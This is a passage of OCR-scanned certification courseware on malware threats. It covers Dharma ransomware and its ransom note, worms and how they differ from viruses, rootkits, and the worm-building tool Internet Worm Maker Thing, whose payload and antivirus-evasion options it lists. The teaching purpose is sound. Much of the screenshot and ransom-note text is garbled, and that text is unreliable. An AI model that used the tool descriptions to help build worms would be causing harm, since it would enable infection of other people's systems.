encrypts the victim’s data (files and documents), which can be decrypted only by the malware author. In some cases, user interaction is restricted using a simple payload. In a web browser, a text file or webpage displays the ransomware demands. The displayed messages appear to be from companies or law enforcement personnel falsely claiming that the victim’s system is being used for illegal purposes or contains illegal content (e.g., porn videos, pirated software), or it could be a Microsoft product activation notice falsely claiming that installed Office software is fake and requires product re-activation. These messages entice victims into paying money to undo the restrictions imposed on them. Ransomware leverages victims’ fear, trust, surprise, and embarrassment to get them to pay the ransom demanded. Files get encrypted and access is blocked demanding ransom Attaches Attacker Ransomware in e-mail Malware executes and gets installed Victim pays ransom to get access Attacker unlocks and provides access Victim gets access 8 to files Figure 1.8: Depiction of ransomware attack Ransomware Families Listed below are some of the ransomware families: = Cerber = CryptorBit = CTB-Locker = CryptoLocker = Sodinokibi = CryptoDefense = BitPaymer = = CryptXXX = CryptoWall Police-themed Ransomware Examples of Ransomware * Dharma Dharma is a dreadful ransomware that was first identified in 2016; since then, it has been affecting various targets across the globe with new versions. It has been regularly updated with sophisticated mechanisms in recent years. At the end of March 2019, Dharma struck a parking lot system in Canada. Previously, it also infected a Texas hospital and some other organizations. The variants of this ransomware have the following extension:.adobe,.bip,.combo,.cezar,.ETH,.java. Its encrypted files have new extensions, such as.xxxxx and.like. This ransomware employs an AES encryption algorithm to encrypt data and then displays ransom notes. These ransom notes are Module 01 Page 66 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 named as either Info.hta or FILES ENCRYPTED.txt. This ransomware carries out through email campaigns. The ransom notes ask victims to contact the threat actors via the provided email address and pay in bitcoins for the decryption service. eadaundcoutts®aol. con = All your files have been encrypted! All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email protected] Write this ID in the title of your message AC197B68 In case of no answer in 24 hours write us to theese e-mails: [email protected] You have to pay for decryption n Becons. The price depends on how fast you wiite to us. After payment we wil send you the decryption toal that wil decrypt al your fies. Free decryption as guarantee Before payng you can send us up to 1 fie for free decryption. The total sze of fies must be less than IMb (non archived), and fies shoud not contan valuable information. (databases backups, large excel sheets, etc.) to obtain Bitcoins The easest way to buy bitcons is LocaBacons site. You have to regster, dick Buy becons', and select the seler by payment method and price. e e T tion! not rename encrypted fies, not try to decrypt your data usng third party software, it may cause permanent data loss., von of your fles with the help of thrd partes may cause noreased pace (they add ther fee to our) or you can become a victim of a scam. Figure 1.9: Screenshot displaying ransom demand message of Dharma ransomware Some additional ransomware are as follows: = eChOraix = MegaCortex = SamSam = LockerGoga = WannaCry = NamPoHyu = Petya - NotPetya = = GandCrab = Module 01 Page 67 Ryuk CryptghOst Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Malicious programs that independently replicate, execute, and spread across the network connections Eaee® smmam ) 9090 v" Consume available computing resources without human interaction v’ Attackers use worm payloads to install backdoors in infected computers... Network Attacker propagates Worm =~ B = (A A @., Downloads Malicious program NS.\@ ) T... A ‘ - All Rights Reserved. Reproduction is Strictly Prohibited Computer Worms Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention. Intruders design most worms to replicate and spread across a network, thus consuming available computing resources and, in turn, causing network servers, web servers, and individual computer systems to become overloaded and stop responding. However, some worms also carry a payload to damage the host system. Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some cases, the worm’s host machine is also infected. Initially, black hat professionals treated worms as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on and targeted Windows OS using the same worms by sharing them in via e-mail, IRC, and other network functions. Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks. Some of the latest computer worms are as follows: = Monero = Bondat. Beapy Module 01 Page 68 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Network Attacker propagates Worm Exam 212-82 Downloads Malicious program Infects other victim systems Figure 1.10: Depiction of worm Module 01 Page 69 propagation Certified Cybersecurity Technician Copyright © by EG-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities How is @ Exam 212-82 a Worm Different from A Worm Replicates on its own * Awormiis a special type of malware that can replicateitself and use memory but cannot attach itself to other programs (:T/\ A Worm Spreads through the Infected Network * sy 7 y A% A worm takes advantage of file or information transport features on computer systems and automatically spreads through the infected network, but a virus does not Copyright How is a Worm a Virus? © by EC-C I All Rights Reserved. Reproduction is Strictly Prohibited. Different from a Virus? Worm Virus A virus infects a system by inserting itself into a file or executable program A worm infects a system by exploiting a vulnerability in an OS or application by replicating itself It might delete or alter the content of files or change the location of files in the system Typically, a worm does not modify any stored It alters the way a computer system operates without the knowledge or consent of a user It consumes network bandwidth, system memory, etc., excessively overloading servers and computer systems A virus cannot spread to other computers unless an infected file is replicated and sent A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after to the other computers installation in a system A virus spreads at a uniform rate, as programmed Viruses are difficult to remove from infected machines programs; it only exploits the CPU and memory A worm spreads more rapidly than a virus Compared with a virus, a worm can be removed easily from a system Table 1.2: Difference between virus and worm Module 01 Page 70 Certified Cybersecurity Technician Copyright © by EC-Gouncil All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Worm @ intome Womm Miker Thing - Versen 300 - Puic Edtion QM MAXES Malkers - V4 0 X Internet Worm Maker Thing Internet Worm Maker Thingisan open-source tool used to create worms thatcan infect victim's drives, files, show messages, and disable antivirus It PPy I trghet Drrp ™ Gowen S2p r Swsh Swre L I kn Swne - I~ Dasie Rogest ™ Comdle Eoplrer e I Cuwrge eg Ouner Ourer: - - I Crurge g Orparmaton Worm r Owrge - Meda Te — I~ Coon CoOmes Foyer e R r‘:_,.,, L e yorot| E San ha ™ Detene a Focer I i Text Max 8 Owrsk Oarge O Tewt I_ [———- [ Owgewsheosr [ ot O B - ™ o ’ I we et — ™ Ase Ve Fortes - et Ve 00 P e atea febevetaon con 1 P Kt Aty ng Aot VT o e e SopertSw et By Mg A g Dee Featme) et - s — Cere e wym I = software 7 jatch WormGe Makers Worm makers are tools that are used to create and customize computer worms to perform malicious tasks. These worms, once created, spread independently over networks and poison entire networks. With the help of pre-defined options in the worm makers, a worm can be designed according to the task it is intended to execute. = Internet Worm Maker Thing Internet Worm Maker Thing is an open-source tool used to create worms that can infect a victim's drives and files, show messages, disable antivirus software, etc. This tool comes with a compiler that can easily convert your batch virus into an executable to evade antivirus software or for any other purpose. Module 01 Page 71 Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities @ Exam 212-82 Intemet Werm Maker Thing :- Version 4.00 :- Public Edition Payloads: = [~ Disable Windows Seaurity R Randomly Activate Payloads Chance of activating payloads: im [ owunce —— [~ Change Date Do MM [ Disable System Restore [_ [_ [~ Change NOD32 Text [™ Play a Sound [~ Print Message " Actvate Payloads On Date [~ Desable Norton Seaurity Tite: [~ Uninstall Norton Saript Blodang ™ Disable Macro Security [~ NoSearchC [T Swap Mouse Buttons d r Change Name I~ Mute Speakers [T Gobal Registry Startup ™ Local Registry Startup ™ Winlogon Shell Hook [ Change Drive lcon DU, BE, ICO: Index: Path: |C:\'-5‘rvdoas‘f001 3 [1_ Text: Extras: I Hde Vrus Fles [ Add To Context Menu 1f You Liked This Program Please [~ Change Gock Text http:/arusteam. fallenne twork. com If You Know Anything About VBS Text (Max 8 Chers): [~ Open Cd Drives I~ Spanish Startip ™ French Startup ™ Infect Vbe Files Computer ™ Delete aFle [T Change Win Meda Player Txt [~ German Startp [~ InfectBatFles [T Corrupt Antivirus Tite: I™ Englsh Startup [~ Blue Sgeen Of Death Infection Options: —— Startup: ™ Start As Service r—E:ah!Whdnms Admin Lockout Bug ™ Infect Vbs Fles [~ Disable Malnare Remove - Disable Windows File Protecton [~ Open Webpage [T Message Box — [~ Hde Desktop [T Dsable Task Manager [~ Disable Mouse ,_ ™ Loop Sound [~ Hde Al Drives [~ Dsable Keybord Y Visit Me On Programming Help Support This Project By Making A Plugn (See Readme). Thanks. ™ Lock Workstation [~ Download Fie I~ Itallan Startup [~ Keyboard Disco More? — URL: Generate Worm [T Change Time About Me Figure 1.11: Screenshot of Internet Worm Maker Thing Some additional worm makers are as follows: = = Batch Worm C++ Worm Module 01 Page 72 Generator Generator Certified Cybersecurity Technician Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 Rootkits @ Rootkits are programs that hide their presence RV as well as attacker’s malicious activities, granting A V them full access to the server or host at that time, and in the future 101101 ," f : L S’ 0101708 Rootkits replace certain operating system (—\ »" calls and utilities with their own modified versions of those routines that, in turn, undermine the security of the target 210301191 11. : _ | / L AR - 7 system causing malicious functions to be executed A typical rootkit comprises of backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, etc. Copyright © by EC- L. All Rights Reserved. Reproduction i Strictly Prohibited Rootkits (Cont’d) @ The attacker places a rootkit by: @ Objectives of a rootkit: O Scanning for vulnerable computers and servers on the web O To root the host system and gain remote backdoor access Q Wrapping it in a special package like a O To mask attacker tracks and presence game Q Installing it on public computers or of malicious applications or processes QO To gather sensitive data, network corporate computers through social traffic, etc. fromthe system to which engineering O Launching a zero-day attack (privilege escalation, buffer overflow, Windows kernel exploitation, etc.) attackers might be restricted or possess no access O To store other malicious programs on the system and act as a server resource for bot updates Copyright © by EC- cll. All Rights Reserved. Reproduction is Strictly Prohibited. Rootkits Rootkits are software programs designed to gain access to a computer without being detected. They are malware that help attackers gain unauthorized access to a remote system and perform malicious activities. The goal of a rootkit is to gain root privileges to a system. By logging in as the root user of a system, an attacker can perform various tasks such as installing software or deleting files. It works by exploiting the vulnerabilities in the OS and its Module 01 Page 73 Certified Cybersecurity Technician Copyright © by EG-Council All Rights Reserved. Reproduction is Strictly Prohibited. Certified Cybersecurity Technician Information Security Threats and Vulnerabilities Exam 212-82 applications. It builds a backdoor login process in the OS via which the attacker can evade the standard login process. Once the user enables root access, a rootkit may attempt to hide the traces of unauthorized access by modifying drivers or kernel modules and discarding active processes. Rootkits replace certain OS calls and utilities with their own modified versions of those routines that, in turn, undermine the security of the target system by executing malicious functions. A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, and others. Rootkits are used to hide viruses, worms, bots, etc., and are difficult to remove. Malware that are hidden by rootkits are used to monitor, filter, or steal sensitive information and resources, change the configuration settings of the target computer, and perform other potentially unsafe actions. Rootkits are installed by attackers after gaining administrative access, either by manipulating a vulnerability or cracking a password. Once the attacker obtains control over the target system, they can modify files and existing software that detects rootkits. Rootkits are activated each time the system is rebooted, before the operating system completes loading, making their detection challenging. Rootkits install hidden files, processes, hidden user accounts, etc., in the system’s operating system to perform malicious activities. They intercept data from terminals, keyboard, and network connections, and enable attackers to extract sensitive information from the target user. Rootkits gather sensitive user information such as usernames, passwords, credit card details, and bank account details, in order to commit fraud or accomplish other malicious objectives. The attacker places a rootkit by = Scanning for vulnerable computers and servers on the web = Wrapping the rootkit in a special package like a game = |Installing it on public or corporate c